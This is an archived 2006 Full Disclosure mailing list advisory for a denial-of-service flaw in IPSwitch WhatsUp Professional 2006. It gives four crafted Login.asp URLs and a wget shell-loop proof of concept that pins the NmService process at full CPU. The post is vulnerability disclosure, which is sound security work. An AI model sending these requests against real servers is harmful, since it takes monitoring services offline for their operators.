Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

IpSwitch WhatsUp Professional 2006 DoS
From: Josh Zlatin <jzlatin () ramat cc>
Date: Wed, 22 Feb 2006 08:23:27 -0500 (EST)

Synopsis: IPSwitch WhatsUp Professional 2006 DoS Flaw

Product: IPSwitch WhatsUp
          http://www.ipswitch.com

Version: Confirmed on WhatsUp Professional 2006

Author: Josh Zlatin-Amishav

Date: February 22, 2006

Background:
WhatsUp Professional 2006 is application and network management that keeps your
critical business technology, like email servers and databases, working efficiently so you can run your business.

Issue:
The NmService.exe executable does not handle certain requests properly. The following URLs can be used to create a DoS condition due to the NmService using
100% CPU

http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&btnLogIn=[Log&In]=&sLoginUserName=

http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&btnLogIn=[Log&In]=&sLoginPassword=

http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&In]=&btnLogIn=

http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&btnLogIn=[Log&In]=


PoC:

while [ 1 ];
do
wget -O /dev/null http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&b;tnLogIn=[Log&In]=&sLoginUserName=; done

References:
http://www.ipswitch.com
http://zur.homelinux.com/Advisories/ipswitch_dos.txt
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • IpSwitch WhatsUp Professional 2006 DoS Josh Zlatin (Feb 22)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]